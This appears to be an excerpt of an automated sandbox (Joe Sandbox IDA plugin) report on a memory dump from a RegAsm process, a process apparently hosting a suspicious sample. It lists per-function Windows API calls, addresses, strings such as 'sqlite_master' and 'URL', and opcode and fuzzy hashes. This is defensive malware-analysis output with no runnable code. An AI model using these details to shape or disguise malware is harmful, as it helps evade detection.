                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                                • Opcode ID: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                • Opcode Fuzzy Hash: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                                • Opcode ID: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscpy$CloseHandle
                                                                                                                                                                                                • String ID: General
                                                                                                                                                                                                • API String ID: 3722638380-26480598
                                                                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                • String ID: d=E
                                                                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                • String ID: URL
                                                                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
